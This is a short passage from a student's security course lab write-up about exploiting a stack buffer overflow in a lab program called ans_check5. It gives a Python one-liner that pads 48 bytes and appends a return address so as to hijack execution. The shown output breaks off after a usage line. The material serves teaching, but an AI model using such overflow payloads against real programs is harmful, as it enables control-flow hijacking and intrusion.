kbckbc/washu_sp22_cse523/lab3.md

 ```

 + Step3.
 Run like below.
 Python code will create meaning-less characters followed by exit return address.
 That return address will overwrite the return address of strcpy.
 If the program exit without 'Segmentation fault', then you found the right place!!!
+  + Think about it.
+Now we know where the return address of strcpy.
+If we can overwrite return address to a target program address we want to execute, and then we can execute it!
 ```
 ans_check5 $( python -c "print '\xAA'*48 + '\xb3\x85\x04\x08'")
 ```

   + Result. * As you can notice, the program exit with special input parameter overwriting the return address
 ```
 [02/10/22]seed@VM:Byeongchan$ ans_check5
 Usage: ans_check5 <answer>